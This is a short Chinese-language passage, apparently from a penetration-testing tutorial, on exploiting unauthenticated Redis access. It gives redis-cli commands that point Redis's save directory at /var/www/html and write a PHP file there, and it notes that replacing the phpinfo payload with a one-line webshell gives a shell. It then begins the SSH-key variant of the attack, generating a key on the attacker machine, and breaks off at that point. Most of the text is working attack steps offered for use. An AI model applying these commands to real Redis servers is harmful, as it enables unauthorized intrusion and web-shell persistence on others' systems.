在redis-cli中写入以下命令:
config set dir /var/www/html/
config set dbfilename redis.php
set webshell “<?php phpinfo(); ?>”
save
然后看一下目录下是否生成了一个redis.php的文件
可以看到生成了,查看一下文件的内容
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-keygen –t rsa
看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容